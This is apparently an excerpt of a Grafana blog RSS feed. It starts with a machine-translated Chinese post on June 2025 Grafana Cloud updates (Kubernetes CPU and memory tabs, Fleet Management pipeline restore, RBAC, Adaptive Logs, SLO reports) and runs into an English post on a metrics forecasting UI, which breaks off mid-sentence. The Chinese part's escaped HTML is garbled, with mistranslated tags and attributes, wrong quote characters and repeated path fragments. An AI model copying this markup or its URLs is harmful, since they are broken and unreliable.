http://schema.org/imageObject”&#xA;&gt; &lt;a&#xA;class =“ Lightbox-link”&#xA;href =“/媒体/docs/grafana-cloud/k8s/logs-table-cluster.png？w = 1920”&#xA;itemprop =“ contenturl”&#xA;&gt; &lt;div class =“ img-wrapper W-100P H-auto”&gt; &lt;img&#xA;class =“ Lazyload”&#xA;data-src =“/媒体/docs/grafana-cloud/k8s/logs-table-cluster.png？w = 1920“ alt =” kubernetes群集的日志表的屏幕截图。”/&gt;&#xA;&lt;NoScript&gt;&#xA;&lt;img&#xA;src =“/媒体/docs/grafana-cloud/k8s/logs-table-cluster.png？w = 1920”&#xA;alt =“ kubernetes群集的日志表的屏幕截图。”/&gt;&#xA;&lt;/noscript&gt; &lt;/div&gt; &lt;/a&gt; &lt;/figie&gt;&#xA;&lt;p&gt;此外，您现在可以在工作负载主页上使用过滤器快速查找&#xA;&lt;a href =“/docs/grafana-cloud/Monitor-Infrastructure/kubernetes-monitoring/navigate-k8s-monitoring/＃discover-non-standard-workloads”&gt; non-standard workloads &lt;/a&gt;。这些非标准工作负载的过滤器包括：&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt; Argo推出&lt;/li&gt;&#xA;&lt;li&gt; Strimzi Pod Sets &lt;/li&gt;&#xA;&lt;li&gt;未管理（或静态）豆荚&lt;/li&gt;&#xA;&lt;li&gt; cronjobs &lt;/li&gt;&#xA;&lt;li&gt;裸露的豆荚&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;图&#xA;class =“图形 -  wrappe-wrappeR__LIGHTBOX W-100P”&#xA;样式=“最大宽度：670px;”&#xA;itemprop =“ iSsectedmedia”&#xA;itemScope =“”&#xA;itemType =“ http://schema.org/imageObject”&#xA;&gt; &lt;a&#xA;class =“ Lightbox-link”&#xA;href =“/媒体/docs/grafana-cloud/k8s/workload-type-sort.png”&#xA;itemprop =“ contenturl”&#xA;&gt; &lt;div class =“ img-wrapper W-100P H-auto”&gt; &lt;img&#xA;class =“ Lazyload”&#xA;data-src =“/媒体/docs/grafana-cloud/k8s/workload-type-sort.png” data-srcset =“/媒体/docs/grafana-cloud/k8s/workload-type-type-type-sort.png？ 550w，/media/Docs/grafana-cloud/k8s/workload-type-sort.png?w=750 750W，/media/Docs/grafana-cloud/k8s/workload-load-type-ypepe-sort.png？w=900 900w， /Media/docs/grafana-cloud/k8s/workload-type-sort.png?w=1040 1040W，/media/docs/grafana-cloud/k8s/workload-load-type-sort.png？ /Media/docs/grafana-cloud/k8s/workload-type-sort.png?w=1920W = 1920W“&#xA;data-sizes =“ auto” alt =“用于非标准工作负载的过滤器的屏幕截图。” width =“ 670” height =“ 802”/&gt;&#xA;&lt;NoScript&gt;&#xA;&lt;img&#xA;src =“/媒体/docs/grafana-cloud/k8s/workload-type-sort.png”&#xA;alt =“用于非标准工作负载的过滤器的屏幕截图。” width =“ 670”高度=“ 802”/&gt;&#xA;&lt;/noscript&gt; &lt;/div&gt; &lt;/a&gt; &lt;/figie&gt;&#xA;&lt;h3 id =“  -  with-with-with-memory and-cpu-tabs”&gt;使用内存和CPU选项卡进行故障排除&lt;/h3&gt;&#xA;&lt;p&gt;在Kubernetes监视中的任何详细页面上，您可以看到CPU和内存使用范围的概述。您现在也可以单击&lt;strong&gt;内存&lt;/strong&gt;或&lt;strong&gt; cpu &lt;/strong&gt; &lt;strong&gt; tab &lt;/strong&gt;查看更多相关的用法信息。 &lt;/p&gt;&#xA;&lt;p&gt;“内存”选项卡及其面板可在容器级别以外的任何详细信息页面上访问。现在，您可以与其他相关数据点一起查看内存使用量，例如，这些工作负载对命名空间的内存使用量最大的贡献。&lt;/p&gt;&#xA;&lt;图&#xA;class =“ figup-wrapper figuper-wrapper__lightbox W-100P”&#xA;style =“最大宽度：px;”&#xA;itemprop =“ iSsectedmedia”&#xA;itemScope =“”&#xA;itemType =“ http://schema.org/imageObject”&#xA;&gt; &lt;a&#xA;class =“ Lightbox-link”&#xA;href =“/媒体/docs/grafana-cloud/k8s/workspace-memory-panels.png？w = 1920”&#xA;itemprop =“ contenturl”&#xA;&gt; &lt;div class =“ img-wrapper W-100P H-auto”&gt; &lt;img&#xA;class =“ Lazyload”&#xA;data-src =“/媒体/docs/grafana-cloud/k8s/workspace-memory-panels.png？w = 1920“ alt =” kubernetes监视中内存使用面板的屏幕截图。”/&gt;&#xA;&lt;NoScript&gt;&#xA;&lt;img&#xA;src =“/媒体/docs/grafana-cloud/k8s/workspace-memory-panels.png？w = 1920”&#xA;alt =“ Kubernetes监视中的内存使用面板的屏幕截图。”/&gt;&#xA;&lt;/noscript&gt; &lt;/div&gt; &lt;/a&gt; &lt;/figie&gt;&#xA;&lt;p&gt;同时，CPU选项卡除了容器页面以外的每个详细信息页面上提供了有见地的面板，以实现更快的故障排除和更好的资源计划。通过利用效率图和CPU分布分析，您可以从群集到POD获得更深的可见性。&lt;/p&gt;。&#xA;&lt;p&gt;例如，您可以使用CPU选项卡来获得容量大小的见解以优化性能。&lt;/p&gt;&#xA;&lt;图&#xA;class =“ figup-wrapper figuper-wrapper__lightbox W-100P”&#xA;样式=“最大宽度：2074px;”&#xA;itemprop =“ iSsectedmedia”&#xA;itemScope =“”&#xA;itemType =“ http://schema.org/imageObject”&#xA;&gt; &lt;a&#xA;class =“ lightb牛链接”&#xA;href =“/媒体/docs/grafana-cloud/k8s/cputab.gif”&#xA;itemprop =“ contenturl”&#xA;&gt; &lt;div class =“ img-wrapper W-100P H-auto”&gt; &lt;img&#xA;class =“ Lazyload”&#xA;data-src =“/媒体/docs/grafana-cloud/k8s/cputab.gif” alt =“ a gif显示cpu tab。” width =“ 2074” height =“ 1656”/&gt;&#xA;&lt;NoScript&gt;&#xA;&lt;img&#xA;src =“/媒体/docs/grafana-cloud/k8s/cputab.gif”&#xA;alt =“ gif显示CPU选项卡。” width =“ 2074”高度=“ 1656”/&gt;&#xA;&lt;/noscript&gt; &lt;/div&gt; &lt;/a&gt; &lt;/figie&gt;&#xA;&lt;p&gt;您可以在我们的CPU和内存选项卡中了解更多信息&#xA;&lt;a href =“/docs/grafana-cloud/Monitor-Infrasture/kubernetes-monitoring/navigate-k8s-monitoring/？pg = blog＆plcmt = body-txt/＃cpu-and-and-ememory-tabs“&gt; kubernetes”&gt; kubernetes监视文档&lt;/a&gt;。 &lt;/p&gt;&#xA;&lt;H2 ID =“ Grafana-fleet-Managements中的新功能”&gt; Grafana Fleet Management &lt;/h2&gt;的新功能&#xA;&lt;p&gt; in&#xA;&lt;a href =“/docs/grafana-cloud/send-data/send-data/fleet-management/？pg = blog＆plcmt = body-txt”&gt; grafana fleet管理&lt;/a&gt;，一种grafana云解决方案，使您可以按比例管理收藏家的部署，使我们能够缩放与恢复和重复使用的新功能有关，并将其推出了新功能。&#xA;&lt;H3 ID =“ Restore-Pipeline-versions”&gt;还原管道版本&lt;/h3&gt;&#xA;&lt;p&gt;&#xA;&lt;a href =“/docs/grafana-cloud/send-data/send-data/fleet-management/manage-fleet/pipelines/view-pipeline-history/”&gt;管道历史记录&lt;/a&gt;现在，车队管理中的功能现在提供了还原现有配置管道的版本的选项。从&lt;strong&gt;历史详细信息&lt;/strong&gt;页面中，选择一个版本，然后单击&lt;strong&gt;还原&lt;/strong&gt;。&lt;/p&gt;&#xA;&lt;p&gt;这是其工作原理：&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;还原管道版本覆盖当前管道的配置。&lt;/li&gt;&#xA;&lt;li&gt;恢复的管道设置为与覆盖管道相同的活动状态或不活动状态。&lt;/li&gt;&#xA;&lt;li&gt;恢复管道版本时，也可以恢复其匹配属性，或者可以在还原版本中持续存在覆盖管道中的匹配属性。&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;图&#xA;class =“ figup-wrapper figuper-wrapper__lightbox W-100P”&#xA;样式=“最大宽度：1999px;”&#xA;itemprop =“ iSsectedmedia”&#xA;itemScope =“”&#xA;itemType =“ http://schema.org/imageObject”&#xA;&gt; &lt;a&#xA;class =“ Lightbox-link”&#xA;href =“/媒体/blog/grafana-cloud-updates-june-june-2025/restore pipipelines-fleet-management.png”&#xA;itemprop =“ contenturl”&#xA;&gt; &lt;div class =“ img-wrapper W-100P H-auto”&gt; &lt;img&#xA;class =“ Lazyload”&#xA;data-src =“/媒体/blog/grafana-cloud-updates-june-2025/reterore-pipelines-fleet-management.png” data-srcset =“/媒体/blog/blog/grafana-cloud-updates-june-2025/reterore-pipelore-pipelores-pipelines-pipelines-fleet-management.png？ /Media/Blog/grafana-cloud-updates-june-2025/restore-pipelines-fleet-management.png?w=550 550W，/media/Blog/grafana-cloud-updates-june-2025/restore-pipelines-pipelines-pipelines-pipelines-fleet-management-management.png？ /Media/blog/grafana-cloud-updates-june-2025/restore-pipelines-fleet-management.png?w=900 900W，/media/Blog/grafana-cloud-poddates-june-2025/restore-pipelines-pipelines-pipelines-pipelines-fleet-management-management.png？ /Media/blog/grafana-cloud-updates-june-2025/restore-pipelines-fleet-management.png?w=1240 1240W，/媒体/blog/blog/grafana-cloud-updates-updates-june-june-2025/rethore-pipelines-fleet-management.png？w = 1920 1920w“&#xA;data-sizes =“ auto” alt =“车队管理中的还原管道功能的屏幕截图。” width =“ 1999”高度=“ 1087”/&gt;&#xA;&lt;NoScript&gt;&#xA;&lt;img&#xA;src =“/媒体/blog/grafana-cloud-updates-june-june-2025/restore pipipelines-fleet-management.png”&#xA;alt =“船队管理中的还原管道功能的屏幕截图。” width =“ 1999”高度=“ 1087”/&gt;&#xA;&lt;/noscript&gt; &lt;/div&gt; &lt;/a&gt; &lt;/figie&gt;&#xA;&lt;H3 ID =“可重复使用的Pipeline-components”&gt;可重复使用的管道组件&lt;/h3&gt;&#xA;&lt;p&gt; Grafana Fleet管理中的管道现在可以利用&#xA;&lt;a href =“/oss/Alloy-opentelemetry-collector/？pg = blog＆plcmt = body-txt”&gt; grafana Alloy &lt;/a&gt; &lt;code&gt; export&gt; enter&gt; grom&gt; grobort &lt;/code&gt; block &lt;/code&gt;与其他管道共享其组件。 &lt;/p&gt;&#xA;&lt;p&gt;与&#xA;&lt;a href =“/docs/docs/grafana-cloud/send-data/fleet-management/intep/configuration-pipelines/pipeline-export-inpoction/“”&gt;管道导出注入&lt;/a&gt;，您可以从一种配置管道中导出组件，并使用另一种配置管道将其注射到语法中&lt;code&gt; grigent.pipeline_exports.value [“ pipeline_name”]] [“ export_name”] &lt;/code&gt;。此功能强大的功能使您可以创建适应每个管道的导出值的动态配置，从而允许灵活和可重复使用的管道配置。&lt;/p&gt;&#xA;&lt;p&gt;您可以在我们的&#xA;&lt;a href =“/docs/grafana-cloud/send-data/fleet-management/manage-fleet/pipelines/view-pipeline-history/？pg = blog＆plcmt = body-txt = body-txt”&gt;车队管理技术文档&lt;/a&gt;。 &lt;/p&gt;&#xA;&lt;H2 ID =“ RBAC-IN-INTHETIC-MONITORINITINIT”&gt; RBAC在合成监测中&lt;/h2&gt;&#xA;&lt;p&gt;现在通常可用，RBAC&#xA;&lt;a href =“/products/cloud/coldthetic-monitoring/？pg = blog＆plcmt = body-txt”&gt; grafana云综合监视&lt;/a&gt;允许您微调访问和权限，因此您可以更加控制谁可以访问特定功能。您可以为用户和团队分配不同的角色和权限，以确保合适的人拥有正确的访问权限。 &lt;/p&gt;&#xA;&lt;p&gt;这使管理监视工作流程更加安全和灵活。&lt;/p&gt;&#xA;&lt;图&#xA;class =“ figup-wrapper figuper-wrapper__lightbox W-100P”&#xA;style =“最大宽度：px;”&#xA;itemprop =“ iSsectedmedia”&#xA;itemScope =“”&#xA;itemType =“ http://schema.org/imageObject”&#xA;&gt; &lt;a&#xA;class =“ Lightbox-link”&#xA;href =“/媒体/doc/nocs/nythetic-monitoring/rbac1.png？w = 1240”&#xA;itemprop =“ contenturl”&#xA;&gt; &lt;div class =“ img-wrapper W-100P H-auto”&gt; &lt;img&#xA;class =“ Lazyload”&#xA;data-src =“/媒体/doc/nocs/synthetic-monitoring/rbac1.png？w = 1240“ alt =”合成监视中的RBAC配置的屏幕截图。”/&gt;&#xA;&lt;NoScript&gt;&#xA;&lt;img&#xA;src =“/媒体/doc/nocts/synthetic-monitoring/rbac1.png？w = 1240”&#xA;alt =“合成监视中的RBAC配置的屏幕截图。”/&gt;&#xA;&lt;/noscript&gt; &lt;/div&gt; &lt;/a&gt; &lt;/figie&gt;&#xA;&lt;p&gt;要了解有关如何在合成监控中分配角色的更多信息，请查看我们的&#xA;&lt;a href =“/docs/grafana/最终/管理/roles-and-permissions/access-control/toss-rbac-roles/？pg = blog＆plcmt = body-txt = body-txt”&gt;文档&lt;/a&gt;。 &lt;/p&gt;&#xA;&lt;h2 id =“自适应日志的早期 - 检测模式”&gt;自适应日志的早期检测模式&lt;/h2&gt;&#xA;&lt;p&gt;&#xA;&lt;a href =“/docs/grafana-cloud/coSt-Management-and填充/自适应 - 仪表/自适应 -  logs //？PG = blog＆plcmt = body-txt“&gt;自适应日志&lt;/a&gt;是一种Grafana云功能，它使用AI/ML技术来分析可观察性的数据，以分析可观察性数据，从而允许使用常见的图案，以便您从中识别出可观的指标，以便您的定制量身定制，以供您定制的doppections。专注于真正重要的信号。&lt;/p&gt;&#xA;&lt;p&gt;本月，我们在自适应日志中推出了一项新功能，该功能使您可以过滤以获取早期检测模式，因此您可以快速识别和删除插入峰值。现在通常可用，此早期检测工具使您可以主动确保只有最有价值的遥测器才能运送到Grafana Cloud。&lt;/p&gt;&#xA;&lt;图&#xA;class =“ figup-wrapper figuper-wrapper__lightbox W-100P”&#xA;style =“最大宽度：px;”&#xA;itemprop =“ iSsectedmedia”&#xA;itemScope =“”&#xA;itemType =“ http://schema.org/imageObject”&#xA;&gt; &lt;a&#xA;class =“ Lightbox-link”&#xA;href =“/媒体/自适应 - 元素/屏幕截图-2025-05-27-AT-12.16.51％e2％e2％80％afpm.png？w = 1920”&#xA;itemprop =“ contenturl”&#xA;&gt; &lt;div class =“ img-wrapper W-100P H-auto”&gt; &lt;img&#xA;class =“ Lazyload”&#xA;data-src =“/媒体/自适应 - 元素/屏幕截图-2025-05-27-AT-12.16.51％E2％E2％80％afpm.png？&#xA;&lt;NoScript&gt;&#xA;&lt;img&#xA;src =“/媒体/自适应 - 元素/屏幕截图-2025-05-27-22.16.51％e2％e2％80％afpm.png？w = 1920”&#xA;alt =“自适应日志中早期检测模式的屏幕截图。”/&gt;&#xA;&lt;/noscript&gt; &lt;/div&gt; &lt;/a&gt; &lt;/figie&gt;&#xA;&lt;p&gt;要查看早期检测模式，请使用&lt;strong&gt;显示早期检测模式&lt;/strong&gt;切换。该切换还向您显示可用的早期模式的数量。您可以在我们的&#xA;&lt;a href =“/docs/grafana-cloud/cost-management-and-billing/audaptive-telemetry/audaptive-logs/manage-recmmendations/＃view-early-early-tectection-tetection-patterns&gt;自适应日志文档docs docs &lt;/a&gt;。 &lt;/p&gt;&#xA;&lt;H2 ID =“ Grafana-Slo-Reports”&gt; Grafana SLO Reports &lt;/h2&gt;&#xA;&lt;p&gt;&#xA;&lt;a href =“/products/cloud/slo/？pg = blog＆plcmt = body-txt”&gt; grafana slo &lt;/a&gt;  - 一个应用程序，该应用程序使得易于创建，管理和规模服务水平的目标，SLO仪表板和GRAFANA云中的错误预算警报 - 在Grafana Cloud中 - 包括一个强大的新功能，可以在每周或一个月的基础上报告多个SLO。 &lt;/p&gt;&#xA;&lt;p&gt;您可以将这些新的SLO报告用于：&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;将多个SLO合并为单个，易于消化的报告&lt;/li&gt;&#xA;&lt;li&gt;查看个人和组合的SLI（服务级指标）指标&lt;/li&gt;&#xA;&lt;li&gt;了解每个SLO对整体SLI性能的加权贡献&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt; SLO报告使随着时间的流逝监视趋势，与利益相关者分享见解变得更加容易，并优先考虑高影响力服务的可靠性工作。&lt;/p&gt;&#xA;&lt;p&gt;要阅读更多，并立即创建您的报告，请查看我们的&#xA;&lt;a href =“/docs/docs/grafana-cloud/nervering-and-inm/slo/revorys/”&gt;技术文档&lt;/a&gt;。 &lt;/p&gt;&#xA;&lt;H2 ID =“ Grafana irm移动应用程序中的同步 - 触发器 - 在Grafana-mimbile-app”&gt;同步联系人&lt;/h2&gt;&#xA;&lt;p&gt;与&#xA;&lt;a href =“/docs/docs/grafana-cloud/nervering and-inm/irm/irm/use/irM-Mobile-app/“&gt; Grafana IRM移动应用程序&lt;/a&gt;，您可以将Grafana IRM使用的电话号码同步到移动设备的联系人中。这使得更容易识别IRM呼叫，并且可选地允许它们覆盖不加工（DND）或无声警报模式。&#xA;&lt;图&#xA;class =“ figup-wrapper figuper-wrapper__lightbox W-100P”&#xA;样式=“最大宽度：783px;”&#xA;itemprop =“ iSsectedmedia”&#xA;itemScope =“”&#xA;itemType =“ http://schema.org/imageObject”&#xA;&gt; &lt;a&#xA;class =“ Lightbox-link”&#xA;href =“/媒体/docs/grafana-cloud/arterning and-nirs/screenshot-contactsync.png”&#xA;itemprop =“ contenturl”&#xA;&gt; &lt;div class =“ img-wrapper W-100P H-auto”&gt; &lt;img&#xA;class =“ Lazyload”&#xA;data-src =“/媒体/docs/grafana-cloud/artering-sirn/screenshot-contact-sync.png“ data-srcset =”/媒体/docs/docs/grafana-cloud/artering------ anding-mirning-and-inm/screenshot-contact-contact-sync.png？ /Media/docs/grafana-cloud/alerting-and-mirm/screenshot-contact-sync.png?w=550 550W，/media/docs/grafana-cloud/alerting/alerting-and-mirm/screenshot-creenshot-contact-contact-contact-sync.png，png，png?w=750 750w，750w，750w，750w，750w，750w，750w， /Media/docs/grafana-cloud/alerting-and-mirm/screenshot-contact-sync.png?w=900 900W，/media/docs/grafana-cloud/alerting/alerting-and-mirm/screenshot-creenshot-contact-contact-contact-sync-sync.png，png?w=1040 1040w， /Media/docs/grafana-cloud/alerting-and-mirm/screenshot-contact-sync.png?w=1240 1240W，/media/docs/grafana-cloud/alerting/alerting-and-mirm/screenshot-contact-contact-contact-sync-sync.png?w-png?w=19202010w“&#xA;data-sizes =“ auto” alt =“在Grafana IRM移动应用中同步联系人的选项屏幕截图。“ width =“ 783” height =“ 1600”/&gt;&#xA;&lt;NoScript&gt;&#xA;&lt;img&#xA;src =“/媒体/docs/grafana-cloud/arterning-mind/screts-contenshot-contactsync.png”&#xA;alt =“ Grafana IRM移动应用中同步联系人的选项屏幕截图。” width =“ 783” height =“ 1600”/&gt;&#xA;&lt;/noscript&gt; &lt;/div&gt; &lt;/a&gt; &lt;/figie&gt;&#xA;&lt;p&gt;您可以在我们的&#xA;&lt;a href =“/docs/grafana-cloud/nervering-and-inm/irm/irm/manage/notifications/phone-and-sms/＃sync-imm-phone-numbers-to-your-to-your-contacts”&gt;技术文档&lt;/a&gt;。 &lt;/p&gt;&#xA;&lt;h2 id =“通过可观察性菜单&lt;/h2&gt;的简化导航&lt;/h2&gt;”&#xA;&lt;p&gt;我们已经更新了Grafana Cloud中的主要导航，以将所有可观察性工具放在一个菜单下，称为&lt;strong&gt;可观察性&lt;/strong&gt;。您现在会发现&#xA;&lt;&#xA;&lt;a href =“/products/cloud/frontend-observiable-for-real-user-monitoring/？pg = blog＆plcmt = body-txt”&gt; frontend observability &lt;/a&gt;，&#xA;&lt;a href =“/solutions/kubernetes/？pg = blog＆plcmt = body-txt”&gt; kubernetes监视&lt;/a&gt;，&#xA;&lt;a href =“/docs/grafana-cloud/Monitor-Infrastructure/monitor-cloud-provider/？pg = blog＆plcmt = body-txt”&gt;云提供者可观察&lt;/a&gt;，并且在一个地方进行了更多分组。&lt;/p&gt;&#xA;&lt;p&gt;此更改是我们提供的努力的一部分：&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;在可观察性工具中更简单，更一致的体验&lt;/li&gt;&#xA;&lt;li&gt;更快地访问相关信号和工作流&lt;/li&gt;&#xA;&lt;li&gt;一个更深层次，背景意识故障排除的基础&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;请继续关注 -  &lt;/p&gt;将很快进行更多改进。&lt;/p&gt;&#xA;&lt;H2 ID =“ new-in-enterprise-data-sources-logicMonitor”&gt;企业数据来源中的新内容：LogicMonitor &lt;/h2&gt;&#xA;&lt;p&gt; LogicMonitor设备数据源插件使您能够查询和可视化&lt;code&gt;设备实例数据&lt;/code&gt;，并直接在Grafana云中直接在Grafana Cloud中直接在GrafAna Cloud中，&lt;Code&gt; Devage&gt; Device&gt; Decects &lt;/code&gt; &lt;/code&gt; &lt;/code&gt; dataSources &lt;/code&gt; &lt;/code &lt;/code&gt;。 &lt;/p&gt;&#xA;&lt;p&gt;了解有关使用和安装LogicMonitor数据源的更多信息&#xA;&lt;a href =“/docs/plugins/grafana-logicmonitor-datasource/最终/”&gt;文档&lt;/a&gt;。总的来说，要了解有关我们的企业数据源的更多信息，请参考&#xA;&lt;a href =“/blog/2024/05/13/grafana-enterprise-data-source-plugins-a-brief-guide-to-to-what-what-what-they-are and-and-and-how-how-to-how-to-to-to-get-started/”&gt;本指南&lt;/a&gt;。 &lt;/p&gt;&#xA;&lt;p&gt; &lt;em&gt;&#xA;&lt;a href =“/products/cloud/？pg = blog＆plcmt = body-txt”&gt; grafana云&lt;/a&gt;是开始事件响应和管理的最简单方法。我们有一个宽敞的永远的层次，并为每个用例都有计划。&#xA;&lt;a href =“/auth/ign-up/create-user？pg = blog＆redirectpath = irm”&gt;现在免费注册&lt;/a&gt;！&lt;/em&gt; &lt;/p&gt; &lt;/em&gt; &lt;/p&gt;</description>
      <pubDate>Wed, 25 Jun 2025 00:00:00 +0000</pubDate>
    </item>
    <item>
      <title>【Adaptive alerting: faster, better insights with the new metrics forecasting UI in Grafana Cloud】自适应警报：更快，更好的见解与新指标预测Grafana Cloud中的UI</title>
      <link>https://grafana.com/blog/2025/06/16/adaptive-alerting-faster-better-insights-with-the-new-metrics-forecasting-ui-in-grafana-cloud/</link>
      <description>【&lt;p&gt;In Grafana Cloud, we offer a range of AI capabilities to support your observability needs, including a feature for forecasting on any of your metrics and coupling it with&#xA;&lt;a href=&#34;/docs/grafana/latest/alerting/?pg=blog&amp;amp;plcmt=body-txt&#34;&gt;Grafana Alerting&lt;/a&gt;. This is critical functionality if you want to make the switch from &lt;em&gt;reactive&lt;/em&gt; to &lt;em&gt;proactive&lt;/em&gt; alerting, as troubleshooting a problem before it arises is an important part of modern observability.&lt;/p&gt;&#xA;&lt;p&gt;For our&#xA;&lt;a href=&#34;/docs/grafana-cloud/alerting-and-irm/machine-learning/dynamic-alerting/forecasting/?pg=blog&amp;amp;plcmt=body-txt&#34;&gt;forecasting capabilities&lt;/a&gt;, we’re excited to announce a new and improved user interface designed to make exploring and fine-tuning forecasts faster, easier, and more intuitive than ever.You don&amp;rsquo;t have to go through several pages, settings, and optimizations anymore; we&amp;rsquo;ve streamlined the entire process.&lt;/p&gt;&#xA;&lt;p&gt;With the new UI, testing your data for forecastability is easier than ever. You’ll see a live preview of the forecast right in your browser, letting you instantly assess how well the model fits your time series. If you think you can improve the model fit, you can now tweak model parameters in real time and see the impact instantly. No more guesswork—just immediate visual feedback.&lt;/p&gt;&#xA;&lt;h2 id=&#34;forecasting-and-adaptive-alerting&#34;&gt;Forecasting and adaptive alerting&lt;/h2&gt;&#xA;&lt;p&gt;Forecasting supports an observability method called &lt;em&gt;adaptive alerting&lt;/em&gt;: Before a problem arises, an alert is triggered to catch the problem so it doesn&amp;rsquo;t manifest. &lt;/p&gt;&#xA;&lt;p&gt;For example, let&amp;rsquo;s say you run a local e-commerce company that tracks its transactions and you want to have a better sense for your future needs. Of course, your transactions vary naturally. You might have more orders on the weekend than on weekdays. Or maybe you have more transactions during evenings than during working hours. By setting up a forecast on the transactions metric, you’ll fit this transaction behavior. &lt;/p&gt;&#xA;&lt;p&gt;And when you combine this with alerts, you&amp;rsquo;ll know when a metric goes out of bounds instead of tuning static alerts, helping to ensure you&amp;rsquo;re on top of your transactions before you run into a situation where you can’t handle them due to a sudden surge. This is especially powerful when used in conjunction with our&#xA;&lt;a href=&#34;/docs/grafana-cloud/alerting-and-irm/machine-learning/dynamic-alerting/forecasting/holidays/?pg=blog&amp;amp;plcmt=body-txt&#34;&gt;daily and weekly seasonality modes&lt;/a&gt; and inclusion of holidays.&lt;/p&gt;&#xA;&lt;figure&#xA;class=&#34;figure-wrapper figure-wrapper__lightbox w-100p &#34;&#xA;style=&#34;max-width: 1999px;&#34;&#xA;itemprop=&#34;associatedMedia&#34;&#xA;itemscope=&#34;&#34;&#xA;itemtype=&#34;http://schema.org/ImageObject&#34;&#xA;&gt;&lt;a&#xA;class=&#34;lightbox-link&#34;&#xA;href=&#34;/media/blog/metrics-forecasting/preview-and-tune.png&#34;&#xA;itemprop=&#34;contentUrl&#34;&#xA;&gt;&lt;div class=&#34;img-wrapper w-100p h-auto&#34;&gt;&lt;img&#xA;class=&#34;lazyload &#34;&#xA;data-src=&#34;/media/blog/metrics-forecasting/preview-and-tune.png&#34;data-srcset=&#34;/media/blog/metrics-forecasting/preview-and-tune.png?w=320 320w, /media/blog/metrics-forecasting/preview-and-tune.png?w=550 550w, /media/blog/metrics-forecasting/preview-and-tune.png?w=750 750w, /media/blog/metrics-forecasting/preview-and-tune.png?w=900 900w, /media/blog/metrics-forecasting/preview-and-tune.png?w=1040 1040w, /media/blog/metrics-forecasting/preview-and-tune.png?w=1240 1240w, /media/blog/metrics-forecasting/preview-and-tune.png?w=1920 1920w&#34;&#xA;data-sizes=&#34;auto&#34;alt=&#34;New metrics forecast menu in the Grafana UI &#34;width=&#34;1999&#34;height=&#34;1084&#34;/&gt;&#xA;&lt;noscript&gt;&#xA;&lt;img&#xA;src=&#34;/media/blog/metrics-forecasting/preview-and-tune.png&#34;&#xA;alt=&#34;New metrics forecast menu in the Grafana UI &#34;width=&#34;1999&#34;height=&#34;1084&#34;/&gt;&#xA;&lt;/noscript&gt;&lt;/div&gt;&lt;/a&gt;&lt;/figure&gt;&#xA;&lt;h2 id=&#34;how-we-improved-metrics-forecasting-in-grafana-cloud&#34;&gt;How we improved metrics forecasting in Grafana Cloud&lt;/h2&gt;&#xA;&lt;p&gt;In order to support this new behavior, we have made some significant technical improvements by separating how we actually run forecasts in Grafana Cloud. (If you don&amp;rsquo;t have one already, you can&#xA;&lt;a href=&#34;/auth/sign-up/create-user/?pg=blog&amp;amp;plcmt=body-txt&#34;&gt;sign up for a forever-free account&lt;/a&gt; today!)&lt;/p&gt;&#xA;&lt;p&gt;Previously, we sent data and parameters into the backend, ran a model, and sent it back to the frontend so that it can be reviewed by the users. By putting the forecasting creation and tuning step into the frontend, it’s now possible to complete this step faster than ever. This is supported by the&#xA;&lt;a href=&#34;https://github.com/grafana/augurs&#34; target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;augurs library&lt;/a&gt;. Augurs does the heavy lifting in the frontend in the customization stage. After that&amp;rsquo;s done, the forecast is sent into the backend to be available 24/7.&lt;/p&gt;&#xA;&lt;h2 id=&#34;how-to-setup-an-adaptive-alert-using-forecasting&#34;&gt;How to setup an adaptive alert using forecasting&lt;/h2&gt;&#xA;&lt;p&gt;Learn how you can setup a forecast in this video:&lt;/p&gt;&#xA;&lt;div&#xA;x-data=&#34;{ vimeo_is_up: false, responded: false }&#34;&#xA;x-init=&#34;fetch(`https://vimeo.com/api/oembed.json?url=https://vimeo.com/1091319872`)&#xA;.then(response =&gt; {&#xA;responded = true;&#xA;response &amp;&amp; response.status === 200 ? vimeo_is_up = true : vimeo_is_up = false;&#xA;})&#xA;.catch(error =&gt; {&#xA;responded = true;&#xA;})&#34;&#xA;x-cloak&gt;&#xA;&lt;figure class=&#34;p-0 m-0&#34;&gt;&#xA;&lt;template x-if=&#34;vimeo_is_up&#34;&gt;&#xA;&lt;div class=&#34;my-1&#34; style=&#34;position: relative; padding-bottom: 56.25%; height: 0; overflow: hidden;&#34;&gt;&#xA;&lt;iframe src=&#34;https://player.vimeo.com/video/1091319872?transparent=0&#34; style=&#34;position: absolute; top: 0; left: 0; width: 100%; height: 100%; border:0;&#34; title=&#34;vimeo video&#34; webkitallowfullscreen mozallowfullscreen allowfullscreen&gt;&lt;/iframe&gt;&#xA;&lt;/div&gt;&#xA;&lt;/template&gt;&#xA;&lt;template x-if=&#34;responded &amp;&amp; !vimeo_is_up&#34;&gt;&#xA;&lt;p class=&#34;bg-gray-17 p-1&#34;&gt;There&amp;rsquo;s supposed to be a video here, but for some reason there isn&amp;rsquo;t. Either we entered the id wrong (oops!), or Vimeo is down. If it&amp;rsquo;s the latter, we&amp;rsquo;d expect they&amp;rsquo;ll be back up and running soon. In the meantime,&#xA;&lt;a href=&#34;/blog/&#34;&gt;check out our blog&lt;/a&gt;!&lt;/p&gt;&#xA;&lt;/template&gt;&#xA;&lt;/figure&gt;&#xA;&lt;/div&gt;&#xA;&lt;p&gt;You can also follow this step-by-step tutorial:&lt;/p&gt;&#xA;&lt;ol&gt;&#xA;&lt;li&gt;In Grafana Cloud, navigate to &lt;strong&gt;Metrics Forecast&lt;/strong&gt;.&lt;/li&gt;&#xA;&lt;li&gt;Choose a metric to create a forecast from. We support the following data sources for forecasting: Prometheus, Graphite, Grafana Loki (metric queries only), Postgres, InfluxDB, Snowflake, Splunk, Elasticsearch, BigQuery, MongoDB, and Datadog.&lt;/li&gt;&#xA;&lt;li&gt;Use our instantaneous preview to tune your model. Also use our advanced model options if you think that the shown forecast isn’t good enough.&lt;/li&gt;&#xA;&lt;li&gt;When you’re done with tuning, give your forecast a name and check the box below it to also create an alert based on it. For names, we recommend that you follow your internal naming conventions to make sure that you find your forecasts more 